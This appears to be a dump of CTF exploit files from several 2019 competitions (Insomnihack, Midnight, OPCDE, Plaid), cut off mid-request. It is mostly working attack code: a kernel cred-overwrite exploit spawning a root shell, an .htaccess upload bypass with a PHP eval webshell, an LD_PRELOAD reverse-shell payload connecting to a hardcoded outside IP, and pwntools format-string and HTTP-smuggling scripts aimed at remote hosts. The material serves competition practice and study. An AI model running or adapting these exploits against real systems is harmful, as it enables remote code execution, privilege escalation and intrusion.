read: 26 | mov r12, #3 27 | b __syscall 28 | 29 
| .global write 30 | write: 31 | mov r12, #4 32 | b __syscall 33 | 34 | .global open 35 | open: 36 | mov r12, #5 37 | b __syscall 38 | 39 | .global close 40 | close: 41 | mov r12, #6 42 | b __syscall 43 | 44 | .global pipe 45 | pipe: 46 | mov r12, #42 47 | b __syscall 48 | 49 | .global mmap 50 | mmap: 51 | mov r12, #192 52 | b __syscall 53 | 54 | .global munmap 55 | munmap: 56 | mov r12, #91 57 | b __syscall 58 | -------------------------------------------------------------------------------- /2019/insomnihack/1118daysober/readme.md: -------------------------------------------------------------------------------- 1 | # 1118daysober 2 | 3 | ## PoC 4 | 5 | - https://github.com/ThomasKing2014/android-Vulnerability-PoC/blob/master/CVE-2015-8966/poc.c 6 | 7 | ```c 8 | #define _GNU_SOURCE 9 | 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | int try_to_read_kernel(){ 30 | int pipefd[2]; 31 | ssize_t len; 32 | ssize_t try_bytes = 4; 33 | 34 | pipe(pipefd); 35 | len = write(pipefd[1], (void*)0xc0008000, try_bytes); 36 | 37 | close(pipefd[0]); 38 | close(pipefd[1]); 39 | 40 | return len == try_bytes; 41 | } 42 | 43 | __attribute__((naked)) long sys_oabi_fcntl64(unsigned int fd, unsigned int cmd, unsigned long arg){ 44 | 45 | __asm __volatile ( 46 | "swi 0x9000DD\n" 47 | "mov pc, lr\n" 48 | : 49 | : 50 | : 51 | ); 52 | } 53 | 54 | #define F_OFD_GETLK 36 55 | #define F_OFD_SETLK 37 56 | #define F_OFD_SETLKW 38 57 | 58 | 59 | int main(int argc, char const *argv[]){ 60 | int fd = open("/proc/cpuinfo", O_RDONLY); 61 | struct flock *map_base = 0; 62 | 63 | if(fd == -1){ 64 | perror("open"); 65 | return -1; 66 | } 67 | map_base = (struct flock *)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 68 | if(map_base == (void*)-1){ 69 | 
perror("mmap"); 70 | goto _done; 71 | } 72 | printf("map_base %p\n", map_base); 73 | memset(map_base, 0, 0x1000); 74 | map_base->l_start = SEEK_SET; 75 | if(sys_oabi_fcntl64(fd, F_OFD_GETLK, (long)map_base)){ 76 | perror("sys_oabi_fcntl64"); 77 | } 78 | // Arbitrary kernel read/write test 79 | if(try_to_read_kernel()){ 80 | printf("pwnned !\n"); 81 | } 82 | munmap(map_base, 0x1000); 83 | _done: 84 | close(fd); 85 | return 0; 86 | } 87 | ``` 88 | 89 | ## Vuln 90 | 91 | - kernel doesn't restore to user_ds. So, we can write any data at any kernel address. 92 | - so that I can't force to restore user_ds. 93 | - detail: https://thomasking2014.com/2016/12/05/CVE-2015-8966.html 94 | 95 | ## Exploit 96 | 97 | - I use read data with o/r/w syscall. It doesn't use user space address, so kernel was not crashed. 98 | 99 | ```c 100 | int junofd = open("./tmp", O_WRONLY); 101 | write(junofd, f_task, 4); 102 | close(junofd); 103 | 104 | int junofd2 = open("./tmp_cred", O_WRONLY); 105 | write(junofd, f_task+400-4, 4); 106 | close(junofd); 107 | ``` 108 | 109 | - save task_structure's next ptr to ./tmp and task's cred ptr to ./tmp_cred 110 | - run until comm equals to `sh`. 111 | 112 | ```c 113 | write(pipefd[1], cred+0x30, 4); 114 | read(pipefd[0], cred+4, 4); 115 | write(pipefd[1], cred+0x30, 4); 116 | read(pipefd[0], cred+8, 4); 117 | write(pipefd[1], cred+0x30, 4); 118 | read(pipefd[0], cred+12, 4); 119 | write(pipefd[1], cred+0x30, 4); 120 | read(pipefd[0], cred+16, 4); 121 | write(pipefd[1], cred+0x30, 4); 122 | read(pipefd[0], cred+20, 4); 123 | write(pipefd[1], cred+0x30, 4); 124 | read(pipefd[0], cred+24, 4); 125 | write(pipefd[1], cred+0x30, 4); 126 | read(pipefd[0], cred+28, 4); 127 | write(pipefd[1], cred+0x30, 4); 128 | read(pipefd[0], cred+32, 4); 129 | ``` 130 | 131 | - finally overwrite cred value (0x3e8 to 0x0) 132 | - I moved binary file with `base64` command. 133 | 134 | ``` 135 | ~ $ ./w 136 | [+] gogo cred haha 137 | do 138 | done! 
139 | /home/user # id 140 | uid=0(root) gid=0 groups=1000 141 | ``` 142 | 143 | -------------------------------------------------------------------------------- /2019/insomnihack/l33t-hoster/..htaccess: -------------------------------------------------------------------------------- 1 | #define 915eefb1c517499ad090b8b05623cdad_width 1337 2 | #define 915eefb1c517499ad090b8b05623cdad_height 1337 3 | AddType application/x-httpd-php .txt 4 | php_value auto_prepend_file "php://filter/convert.quoted-printable-decode/resource=./juno.asdf" -------------------------------------------------------------------------------- /2019/insomnihack/l33t-hoster/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | gcc -c -fPIC hack.c -o hack 3 | gcc -shared hack -o hack.so 4 | curl -F 'xxx=@./hack.so' http://35.246.234.136/images/c5d06e5d63a2d5b6ec392969fd4eac658f8f82d9/exp.txt 5 | -------------------------------------------------------------------------------- /2019/insomnihack/l33t-hoster/exp.txt: -------------------------------------------------------------------------------- 1 | #define 915eefb1c517499ad090b8b05623cdad_width 1337 2 | #define 915eefb1c517499ad090b8b05623cdad_height 1337 3 | # asdf -------------------------------------------------------------------------------- /2019/insomnihack/l33t-hoster/hack.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #define REMOTE_ADDR "174.138.24.108" 13 | #define REMOTE_PORT 80 14 | 15 | 16 | void payload() { 17 | sigignore(SIGALRM); 18 | 19 | struct sockaddr_in sa; 20 | int s; 21 | 22 | sa.sin_family = AF_INET; 23 | sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR); 24 | sa.sin_port = htons(REMOTE_PORT); 25 | 26 | s = socket(AF_INET, SOCK_STREAM, 0); 27 | connect(s, (struct sockaddr *)&sa, sizeof(sa)); 28 | 29 | dup2(s, 0); 
30 | dup2(s, 1); 31 | dup2(s, 2); 32 | 33 | // execve("/bin/sh", 0, 0); 34 | 35 | chdir("/"); 36 | execve("/get_flag", 0, 0); 37 | 38 | } 39 | 40 | uid_t geteuid() { 41 | if(getenv("LD_PRELOAD") == NULL) { return 0; } 42 | unsetenv("LD_PRELOAD"); 43 | payload(); 44 | } 45 | -------------------------------------------------------------------------------- /2019/insomnihack/l33t-hoster/juno.asdf: -------------------------------------------------------------------------------- 1 | #define 915eefb1c517499ad090b8b05623cdad_width 1337 2 | #define 915eefb1c517499ad090b8b05623cdad_height 1337 3 | =0A=3c?php error_reporting(E_ALL); ini_set("display_errors", 1); eval($_GET[x]); 4 | // move_uploaded_file($_FILES['xxx']['tmp_name'], '/var/www/html/images/c5d06e5d63a2d5b6ec392969fd4eac658f8f82d9/xx.so'); 5 | // phpinfo(); 6 | ?> -------------------------------------------------------------------------------- /2019/insomnihack/l33t-hoster/readme.md: -------------------------------------------------------------------------------- 1 | # l33t-hoster 2 | 3 | ## Vuln 4 | 5 | ```php 6 | $tmp_name = $_FILES["image"]["tmp_name"]; 7 | $name = $_FILES["image"]["name"]; 8 | $parts = explode(".", $name); 9 | $ext = array_pop($parts); 10 | 11 | if (empty($parts[0])) { 12 | array_shift($parts); 13 | } 14 | 15 | if (count($parts) === 0) { 16 | die("lol filename is empty"); 17 | } 18 | ``` 19 | - We can upload .htaccess file with `..htaccess` filename. 20 | - But we have to bypass getimagesize. 21 | - Since getimagesize lazy checks image header, only some signatures, width and height. 22 | - We have to apache .htaccess's bad characters e.g.) non valid chracters except #(comment) 23 | - See the following source code. 
24 | - https://github.com/php/php-src/blob/master/ext/standard/image.c#L1381 25 | - https://github.com/php/php-src/blob/master/ext/standard/image.c#L1033 26 | 27 | ```c 28 | if (php_get_xbm(stream, NULL)) { 29 | return IMAGE_FILETYPE_XBM; 30 | } 31 | return IMAGE_FILETYPE_UNKNOWN; 32 | ``` 33 | 34 | ```c 35 | static int php_get_xbm(php_stream *stream, struct gfxinfo **result) 36 | { 37 | char *fline; 38 | char *iname; 39 | char *type; 40 | int value; 41 | unsigned int width = 0, height = 0; 42 | 43 | if (result) { 44 | *result = NULL; 45 | } 46 | if (php_stream_rewind(stream)) { 47 | return 0; 48 | } 49 | while ((fline=php_stream_gets(stream, NULL, 0)) != NULL) { 50 | iname = estrdup(fline); /* simple way to get necessary buffer of required size */ 51 | if (sscanf(fline, "#define %s %d", iname, &value) == 2) { 52 | if (!(type = strrchr(iname, '_'))) { 53 | type = iname; 54 | } else { 55 | type++; 56 | } 57 | 58 | if (!strcmp("width", type)) { 59 | width = (unsigned int) value; 60 | if (height) { 61 | efree(iname); 62 | break; 63 | } 64 | } 65 | if (!strcmp("height", type)) { 66 | height = (unsigned int) value; 67 | if (width) { 68 | efree(iname); 69 | break; 70 | } 71 | } 72 | } 73 | efree(fline); 74 | efree(iname); 75 | } 76 | if (fline) { 77 | efree(fline); 78 | } 79 | 80 | if (width && height) { 81 | if (result) { 82 | *result = (struct gfxinfo *) ecalloc(1, sizeof(struct gfxinfo)); 83 | (*result)->width = width; 84 | (*result)->height = height; 85 | } 86 | return IMAGE_FILETYPE_XBM; 87 | } 88 | 89 | return 0; 90 | } 91 | ``` 92 | - If there is a line with `#define %s %d`, we can put any lines in the file. 93 | - So if we make .htaccess file like this. 94 | 95 | ``` 96 | #define 915eefb1c517499ad090b8b05623cdad_width 1337 97 | #define 915eefb1c517499ad090b8b05623cdad_height 1337 98 | blahblah 99 | ``` 100 | 101 | - We can easily bypass the getimagesize filter. 
102 | 103 | ## Exploit 104 | 105 | ### RCE 106 | 107 | - Now we can upload .htaccess with arbitrary data. 108 | - auto_prepend value supports php protocol, we can run the php script. 109 | - However there is another filter. (if file contains ` 119 | ``` 120 | 121 | ### SBX Escape 122 | 123 | - There are disable_functions :( . 124 | ``` 125 | pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec,posix_mkfifo, pg_lo_import, dbmopen, dbase_open, popen, chgrp, chown, chmod, symlink,apache_setenv,define_syslog_variables, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_uname, proc_close, pclose, proc_nice, proc_terminate,curl_exec,curl_multi_exec,parse_ini_file,show_source,imap_open,fopen,copy,rename,readfile,readlink,tmpfile,tempnam,touch,link,file_put_contents,file,ftp_connect,ftp_ssl_connect, 126 | ``` 127 | - We can use LD_PRELOAD and mail trick to escape SBX. (https://blog.csdn.net/qq_27446553/article/details/80235811) 128 | - I used reverse shell. 129 | 130 | ### Bypass Alarm. 131 | 132 | - There is a simple captcha, but the alarm occurs in 0.01sec. 133 | 134 | ``` 135 | newa.it_value.tv_sec = 0LL; 136 | newa.it_value.tv_usec = 10000LL; // 1000000 137 | newa.it_interval.tv_sec = 0LL; 138 | newa.it_interval.tv_usec = 0LL; 139 | setitimer(ITIMER_REAL, &newa, 0LL); 140 | ``` 141 | - We can ignore sigalrm with sigignore function. 
142 | 143 | ``` 144 | sigignore(SIGALRM); 145 | 146 | ``` 147 | 148 | -------------------------------------------------------------------------------- /2019/midnightctf/hfsipc/exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define HFS_CREATE 0xABCD0001 7 | #define HFS_DESTROY 0xABCD0002 8 | #define HFS_READ 0xABCD0003 9 | #define HFS_WRITE 0xABCD0004 10 | 11 | // from gist 12 | void dumpHex(const void* data, size_t size) { 13 | char ascii[17]; 14 | size_t i, j; 15 | ascii[16] = '\0'; 16 | for (i = 0; i < size; ++i) { 17 | printf("%02X ", ((unsigned char*)data)[i]); 18 | if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { 19 | ascii[i % 16] = ((unsigned char*)data)[i]; 20 | } else { 21 | ascii[i % 16] = '.'; 22 | } 23 | if ((i+1) % 8 == 0 || i+1 == size) { 24 | printf(" "); 25 | if ((i+1) % 16 == 0) { 26 | printf("| %s \n", ascii); 27 | } else if (i+1 == size) { 28 | ascii[(i+1) % 16] = '\0'; 29 | if ((i+1) % 16 <= 8) { 30 | printf(" "); 31 | } 32 | for (j = (i+1) % 16; j < 16; ++j) { 33 | printf(" "); 34 | } 35 | printf("| %s \n", ascii); 36 | } 37 | } 38 | } 39 | } 40 | 41 | struct HFS_CREATE_DATA { 42 | uint64_t HFS_ID; 43 | uint64_t HFS_SIZE; 44 | }; 45 | 46 | struct HFS_DESTROY_DATA { 47 | uint64_t HFS_ID; 48 | }; 49 | 50 | struct HFS_READ_DATA { 51 | uint64_t HFS_ID; 52 | uint64_t HFS_SIZE; 53 | char** USER_BUF; 54 | }; 55 | 56 | struct HFS_WRITE_DATA { 57 | uint64_t HFS_ID; 58 | uint64_t HFS_SIZE; 59 | char* USER_BUF; 60 | }; 61 | 62 | int fd; 63 | long long int ret; 64 | unsigned char buf[0x1000]; 65 | unsigned char i_buf[0x1000]; 66 | unsigned char w_buf[0x1000]; 67 | 68 | struct HFS_CREATE_DATA hcd; 69 | struct HFS_DESTROY_DATA hdd; 70 | struct HFS_READ_DATA hrd; 71 | struct HFS_WRITE_DATA hwd; 72 | 73 | 74 | void aWrite(uint64_t ptr, uint64_t size) { 75 | memset(buf, 0, 0x1000); 76 | 77 | hwd.HFS_ID = 0x70; 78 | hwd.HFS_SIZE = 
0x50; 79 | hwd.USER_BUF = buf; 80 | 81 | memcpy(buf, "\xff\xff\xff\xff\x00\x00\x00\x00", 0x8); // size 82 | memcpy(buf+0x30, "\x61\x00\x00\x00\x00\x00\x00\x00", 0x08); // next obj header (id) 83 | memcpy(buf+0x30+0x8, &ptr, 0x08); // next obj ptr 84 | memcpy(buf+0x30+0x10, "\xff\xff\xff\xff\x00\x00\x00\x00", 0x08); // next obj size 85 | ret = ioctl(fd, HFS_WRITE, &hwd); 86 | printf("write ret: %llx\n", ret); 87 | 88 | memset(w_buf, 0, 0x1000); 89 | hwd.HFS_ID = 0x61; 90 | hwd.HFS_SIZE = size; 91 | hwd.USER_BUF = w_buf; 92 | ret = ioctl(fd, HFS_WRITE, &hwd); 93 | printf("overwrite ret: %llx\n", ret); 94 | 95 | } 96 | 97 | void aRead(uint64_t ptr, uint64_t size) { 98 | memset(buf, 0, 0x1000); 99 | 100 | hwd.HFS_ID = 0x70; 101 | hwd.HFS_SIZE = 0x50; 102 | hwd.USER_BUF = buf; 103 | 104 | memcpy(buf, "\xff\xff\xff\xff\x00\x00\x00\x00", 0x8); // size 105 | memcpy(buf+0x30, "\x61\x00\x00\x00\x00\x00\x00\x00", 0x08); // next obj header (id) 106 | memcpy(buf+0x30+0x8, &ptr, 0x08); // next obj ptr 107 | memcpy(buf+0x30+0x10, "\xff\xff\xff\xff\x00\x00\x00\x00", 0x08); // next obj size 108 | ioctl(fd, HFS_WRITE, &hwd); 109 | 110 | memset(i_buf, 0, 0x1000); 111 | hrd.HFS_ID = 0x61; 112 | hrd.HFS_SIZE = size; 113 | hrd.USER_BUF = i_buf; 114 | ioctl(fd, HFS_READ, &hrd); 115 | 116 | } 117 | 118 | int main(int argc, char **argv) { 119 | 120 | fd = open(argv[1], O_RDWR); 121 | if (fd < 0) { 122 | printf("failed to open ioctl\n"); 123 | exit(-1); 124 | return -1; 125 | } 126 | 127 | hcd.HFS_ID = 0x4140; 128 | hcd.HFS_SIZE = 0x20; 129 | ret = ioctl(fd, HFS_CREATE, &hcd); 130 | printf("ret: %llx\n", ret); // pad for offset 131 | 132 | 133 | hcd.HFS_ID = 0x4142; 134 | hcd.HFS_SIZE = 0x20; 135 | ret = ioctl(fd, HFS_CREATE, &hcd); 136 | printf("ret: %llx\n", ret); 137 | 138 | hcd.HFS_ID = 0x00; 139 | hcd.HFS_SIZE = 0x20; 140 | ret = ioctl(fd, HFS_CREATE, &hcd); 141 | printf("x ret: %llx\n", ret); 142 | 143 | hcd.HFS_ID = 0x60; // vuln object 144 | hcd.HFS_SIZE = 0x20; 145 | ret = 
ioctl(fd, HFS_CREATE, &hcd); 146 | printf("ret: %llx\n", ret); 147 | 148 | hwd.HFS_ID = 0x60; 149 | hwd.HFS_SIZE = 0x21; 150 | hwd.USER_BUF = buf; 151 | 152 | memcpy(buf, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x28", 0x21); // need to fit the offset. 153 | ret = ioctl(fd, HFS_WRITE, &hwd); 154 | printf("write ret: %llx\n", ret); 155 | 156 | hcd.HFS_ID = 0x61; // vuln object 157 | hcd.HFS_SIZE = 0x20; 158 | ret = ioctl(fd, HFS_CREATE, &hcd); 159 | printf("ret: %llx\n", ret); 160 | 161 | hcd.HFS_ID = 0x62; // vuln object 162 | hcd.HFS_SIZE = 0x20; 163 | ret = ioctl(fd, HFS_CREATE, &hcd); 164 | printf("ret: %llx\n", ret); 165 | 166 | hwd.HFS_ID = 0x61; 167 | hwd.HFS_SIZE = 0x21; 168 | hwd.USER_BUF = buf; 169 | 170 | printf("[+] Overwriting Offset ..\n"); 171 | 172 | memcpy(buf+0x10+0x8, "\x70\x00\x00\x00\x00\x00\x00\x00", 0x8); // overwrite id 173 | memcpy(buf+0x10+0x10, "\x50", 0x1); // overwrite offset 174 | 175 | ret = ioctl(fd, HFS_WRITE, &hwd); 176 | printf("write ret: %llx\n", ret); 177 | 178 | // overwrite size 179 | 180 | hwd.HFS_ID = 0x70; 181 | hwd.HFS_SIZE = 0x8; 182 | hwd.USER_BUF = buf; 183 | 184 | printf("[+] Overwriting Size ..\n"); 185 | 186 | memcpy(buf, "\xff\xff\xff\xff\x00\x00\x00\x00", 0x8); // overwrite size 187 | 188 | ret = ioctl(fd, HFS_WRITE, &hwd); 189 | printf("write ret: %llx\n", ret); 190 | 191 | 192 | for (uint64_t i=0xffff880005000000; i<=0xffff880006fff000; i+=0x1000) { 193 | aRead(i, 0x1000); 194 | 195 | for (int j=0; j< 0x1000; j+= 4) { 196 | if (i_buf[j] == 0xe8 && i_buf[j+1] == 0x03 && i_buf[j+2] == 0x00&& i_buf[j+3] == 0x00) { 197 | printf("found!: %llx\n", i+j); 198 | memset(w_buf, 0, 4); 199 | aWrite(i+j, 4); 200 | } 201 | } 202 | 203 | // printf("[%llx]\n", i); 204 | // dumpHex(i_buf, 0x1000); 205 | } 206 | 207 | aRead(0xffffffffa0000000, 0x100); 208 | dumpHex(i_buf, 0x100); 209 | 210 | setuid(0); 211 | 212 | system("ls -al /root"); 213 | system("cat /root/*"); 214 | system("/bin/sh"); 215 | 216 | return 0; 217 | } 218 | 
-------------------------------------------------------------------------------- /2019/midnightctf/hfsipc/make.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | gcc -o exploit exploit.c -static -w 3 | tar -czf x.tar.gz exploit 4 | base64 x.tar.gz 5 | -------------------------------------------------------------------------------- /2019/opcde_mini/custom_printf_public/readme.md: -------------------------------------------------------------------------------- 1 | - custom format string printf. 2 | -------------------------------------------------------------------------------- /2019/opcde_mini/custom_printf_public/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import ctypes 3 | 4 | 5 | OP_OVERWRITE = '\xf0\x9f\x98\xa1' 6 | OP_STRLEN = '\xf0\x9f\x98\x82' 7 | OP_LEAK = '\xf0\x9f\xa4\x94' 8 | 9 | leak_payload = 'GRI' + OP_LEAK + 'GOL' + OP_LEAK + 'JUNO' + OP_LEAK + 'IM' 10 | 11 | def overwrite(target, byte): 12 | payload = '' 13 | payload += OP_LEAK * 7 14 | payload += OP_LEAK * 16 15 | payload += OP_LEAK * 14 16 | 17 | if byte < 0x60: 18 | payload += ' '*byte 19 | elif byte < 0x90: 20 | payload += '\xF0\x9F\x95\x9b' 21 | payload += '\xF0\x9F\x95\x95' 22 | payload += ' ' * (byte-0x60+1) 23 | elif byte < 0xb0: 24 | payload += '\xF0\x9F\x95\x9b' 25 | payload += '\xF0\x9F\x95\x98' 26 | payload += ' ' * (byte-0x90+1) 27 | elif byte < 0xd0: 28 | payload += '\xF0\x9F\x95\x9b' 29 | payload += '\xF0\x9F\x95\x98' 30 | payload += ' \xF0\x9F\x95\x9b' 31 | payload += '\xF0\x9F\x95\x91' 32 | payload += ' ' * (byte-0xb0+1) 33 | elif byte < 0x100: 34 | payload += '\xF0\x9F\x95\x9b' 35 | payload += '\xF0\x9F\x95\x98' 36 | payload += ' \xF0\x9F\x95\x9b' 37 | payload += '\xF0\x9F\x95\x93' 38 | payload += ' ' * (byte-0xd0+1) 39 | 40 | payload += '\xf0\x9f\x98\xa1' 41 | 42 | payload = payload.ljust(0xf0, '_') 43 | 44 | payload += p64(target) 45 | 46 | return payload 
47 | 48 | 49 | # context.log_level = 'debug' 50 | context.terminal = ['tmux', 'splitw', '-h'] 51 | 52 | # r = process('./custom_printf')#, aslr=False) 53 | r = remote('54.64.183.252', 20008) 54 | # r = remote('192.168.10.226', 20008) 55 | 56 | script = ''' 57 | b *0x0000000000401A8F 58 | # b *0x0000000000400BE2 59 | b *0x400ffa 60 | c 61 | ''' 62 | 63 | r.sendline(leak_payload) 64 | 65 | r.recvuntil('GRI') 66 | data = int(r.recvuntil('GOL').replace('GOL', '')) 67 | 68 | _ = ctypes.c_uint32(data + 0x1049) 69 | w = _.value + 0x7fff00000000 70 | print 'RET STACK', hex(w) 71 | 72 | r.recvuntil('JUNO') 73 | data = int(r.recvuntil('IM').replace('IM', '')) 74 | 75 | _ = ctypes.c_uint32(data - 0x00000000000F7260) 76 | print 'LIBC', hex(_.value) 77 | 78 | q = _.value 79 | 80 | libc = {} 81 | libc[0] = q + 0x45216 82 | libc[1] = q + 0x4526a 83 | libc[2] = q + 0xf02a4 84 | libc[3] = q + 0xf1147 # use this 85 | 86 | r.sendline(overwrite(w, libc[3] & 0xff)) 87 | r.sendline(overwrite(w + 1, (libc[3] >> 8) & 0xff)) 88 | r.sendline(overwrite(w + 2, (libc[3] >> 16) & 0xff)) 89 | r.sendline('bye') 90 | 91 | r.sendline('id') 92 | r.sendline('cat /flag') 93 | 94 | # r.sendline(payload) 95 | 96 | ''' 97 | b *0x0000000000401A8F 98 | b *0x0000000000401AE6 99 | ''' 100 | 101 | r.interactive() -------------------------------------------------------------------------------- /2019/opcde_mini/misconf_public/main.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | from flask import Flask 4 | from flask import Flask, flash, redirect, render_template, request, session, abort, url_for 5 | 6 | app = Flask(__name__) 7 | app.debug = False 8 | app.secret_key = 'wkadkswkrhcnfrmsgkslsjanvlrhsgkek1234' 9 | 10 | 11 | @app.route("/") 12 | def index(): 13 | if not session.get('logged_in'): 14 | return render_template('index.html') 15 | else: 16 | if session['role'] == 'guest': 17 | message = open('./static/message').read() 18 | elif session['role'] == 
'admin': 19 | message = open('/flag').read() 20 | 21 | return render_template('login.html', message=message) 22 | 23 | @app.route("/login", methods=['POST']) 24 | def login(): 25 | if request.method != 'POST': 26 | return redirect(url_for('index')) 27 | 28 | username = request.form.get('username') 29 | password = request.form.get('password') 30 | 31 | if username and password: 32 | session['logged_in'] = True 33 | session['username'] = username 34 | session['password'] = password 35 | session['role'] = 'admin' 36 | 37 | return redirect(url_for('index')) 38 | 39 | 40 | @app.route("/logout") 41 | def logout(): 42 | if session.get('logged_in'): 43 | for key in list(session.keys()): 44 | session.pop(key) 45 | 46 | return redirect(url_for('index')) 47 | 48 | 49 | if __name__ == "__main__": 50 | app.run(host="0.0.0.0", port=80) 51 | -------------------------------------------------------------------------------- /2019/opcde_mini/misconf_public/readme.md: -------------------------------------------------------------------------------- 1 | - There is a mis configuration for nginx alias. 2 | - Hence we can get a main.py that containing real secret_key. (http://54.64.183.252:8080/static../main.py) 3 | - Make role=admin session with secret_key! 
4 | -------------------------------------------------------------------------------- /2019/plaid/potent/solve.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | 4 | import requests 5 | 6 | from pwn import * 7 | 8 | import zlib 9 | 10 | 11 | headers = { 12 | 'Origin': 'http://quotables.pwni.ng:1337', 13 | 'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8', 14 | } 15 | 16 | 17 | # using ascii-zip 18 | wow = 'D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUUwCiudIbEAtwwwEtswGpDttpDDwt3ww03sG333333swwG03333sDDdFPiOMwSgoZOwMYzcoogqffVAaFVvaFvQFVaAfgkuSmVvNnFsOzyifOMwSgoy4' 19 | 20 | 21 | data = { 22 | 'quote': 'HTTP/1.0 200 OK\r\nHTTP/1.0 302 OK\r\nContent-Encoding: deflate\r\nContent-Type: text/html;\r\nContent-Lexngth: {length}\r\n\r\n'.format(length=len(wow)) + wow, 23 | 'attribution': '' 24 | } 25 | 26 | response = requests.post('http://quotables.pwni.ng:1337/quotes/new', headers=headers, data=data) 27 | # response = requests.post('http://quotables.pwni.ng:1337/quotes/new', headers=headers, files=files) 28 | key = response.history[0].headers['Location'].split('quote#')[1] 29 | 30 | from pwn import * 31 | 32 | r = remote('quotables.pwni.ng', 1337) 33 | r.sendline('''GET /api/quote/{target} HTTP/0.9 34 | Connection: keep-alive 35 | Host: quotables.pwni.ng:1337 36 | Range: bytes=0-2 37 | Cache-Control: max-age=0 38 | Upgrade-Insecure-Requests: 1 39 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3 40 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 41 | Content-Transfer-Encoding: BASE64 42 | Accept-Charset: iso-8859-15 43 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 44 | Proxy-Connection: close 45 | 46 | '''.replace('\n', '\r\n').format(target=key)) 47 | 48 | r.close() 49 | 50 | url = 'http://quotables.pwni.ng:1337/api/quote/' + key 51 | 52 | print '-'*20 53 | 
print url 54 | 55 | c = requests.post(url) 56 | # print c.content.encode('hex') 57 | 58 | qwer = c.content.split('\r\n\r\n')[1] 59 | print qwer.encode('hex') 60 | # print brotli.decompress(qwer)[:-3] 61 | 62 | 63 | c = requests.get(url) 64 | print c.text 65 | -------------------------------------------------------------------------------- /2019/plaid/spectre/readme.md: -------------------------------------------------------------------------------- 1 | # spectre 2 | 3 | - I assisted @_bincat 4 | - exploit: https://github.com/bincat99/pwn/blob/master/plaid-2019/spectre/sol.py 5 | -------------------------------------------------------------------------------- /2019/plaid/spectre/upload_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import sys, time 4 | 5 | from requests import get, post 6 | from pprint import pprint 7 | 8 | try: 9 | my_file = sys.argv[2] 10 | except: 11 | my_file = None 12 | 13 | 14 | token = sys.argv[1] 15 | 16 | url = 'http://spectre.pwni.ng:4000/' 17 | files = { 18 | 'script': open(my_file if my_file else 'bin.bin', 'rb'), 19 | } 20 | 21 | data = { 22 | 'pow': token 23 | } 24 | 25 | c = post(url, data=data, files=files) 26 | result = c.history[0].headers['Location'] 27 | 28 | while True: 29 | c = get(result) 30 | data = c.content 31 | 32 | if not '00000000 00000000' in data: 33 | time.sleep(1) 34 | continue 35 | 36 | break 37 | 38 | if '00000000 00000000' in data: 39 | # processing 4141 mem 40 | mem = [] 41 | _ = data.split('
')[1].split('
')[0].strip().replace(' ', '').replace('\n', '') 42 | for i in xrange(0, len(_), 16): 43 | low = int(_[i: i+8], 16) 44 | high = int(_[i+8: i+16], 16) << 32 45 | q = low + high 46 | if q == 0: q = 0xffffffff 47 | mem.append(q) 48 | 49 | print(mem) 50 | print(min(mem)) 51 | print(mem.index(min(mem))) 52 | 53 | 54 | 55 | else: 56 | print(data) 57 | -------------------------------------------------------------------------------- /2019/plaid/triggerd/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from requests import post, get 3 | import thread 4 | import time 5 | import os 6 | 7 | url = 'http://triggered.pwni.ng:52856/register' 8 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 9 | data = {'username': 'juno1234xx'+os.urandom(3).encode('hex')} 10 | data['password'] = 'A'*4096*2 11 | data['confirm-password'] = data['password'] 12 | c = post(url=url, data=data, headers=headers) 13 | print c.history 14 | print c.content 15 | 16 | print '-------------------------' 17 | time.sleep(1) 18 | 19 | r1 = remote('triggered.pwni.ng', 52856) 20 | r2 = remote('triggered.pwni.ng', 52856) 21 | 22 | session = 'f4bf90e2-e6a7-4980-80e4-a9559adf3380' 23 | 24 | def go1(): 25 | global session, r1, data 26 | r1.sendline('''POST /login HTTP/1.1 27 | Host: localhost:1234 28 | Connection: keep-alive 29 | Content-Length: {length} 30 | Cache-Control: max-age=0 31 | Cookie: session={session} 32 | Origin: http://triggered.pwni.ng:52856 33 | Upgrade-Insecure-Requests: 1 34 | Content-Type: application/x-www-form-urlencoded 35 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 37 | Referer: http://triggered.pwni.ng:52856/login 